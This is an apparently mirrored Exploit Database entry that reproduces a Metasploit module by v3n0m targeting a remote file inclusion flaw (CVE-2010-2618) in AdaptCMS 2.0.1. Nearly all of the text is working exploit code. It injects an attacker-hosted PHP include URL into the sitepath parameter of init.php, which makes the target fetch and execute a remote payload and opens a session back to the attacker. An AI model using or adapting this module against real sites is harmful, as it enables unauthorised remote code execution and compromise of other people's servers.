AdaptCMS 2.0.1 Beta – Remote File Inclusion (Metasploit)

• Exploit Database
• 13 阅读

• 作者： v3n0m
  日期： 2010-10-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15237/

• ##
  #) )) ( ( ( (( ) ) 
  #( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( 
  #)\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\())
  # ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ 
  #__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_)
  #\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / 
  # \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
  #|_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
  #										.WEB.ID
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = ExcellentRanking
  
  	include Msf::Exploit::Remote::Tcp
  	include Msf::Exploit::Remote::HttpClient
  	include Msf::Exploit::Remote::HttpServer::PHPInclude
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
  			'Description'=> %q{
  					This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
  
  			},
  			'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision:$',
  			'References' => 				
  				[
  					[ 'CVE', '2010-2618' ],
  					[ 'BID', '41116' ],
  				],
  			'Privileged' => false,
  			'Payload'=>
  				{
  					'DisableNops' => true,
  					'Compat'=>
  						{
  							'ConnectionType' => 'find',
  						},
  					'Space' => 262144, # 256k
  				},
  			'Platform' => 'php',
  			'Arch' => ARCH_PHP,
  			'Targets'=> [[ 'Automatic', { }]],
  			'DisclosureDate' => 'Oct 12 2010',
  			'DefaultTarget' => 0))
  
  		register_options([
  			OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
  			], self.class)
  	end
  
  	def php_exploit
  
  		timeout = 0.01
  		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
  		print_status("Trying uri #{uri}")
  
  		response = send_request_raw( {
  				'global' => true,
  				'uri' => uri,
  			},timeout)
  
  		if response and response.code != 200
  			print_error("Server returned non-200 status code (#{response.code})")
  		end
  		
  		handler
  	end
  
  end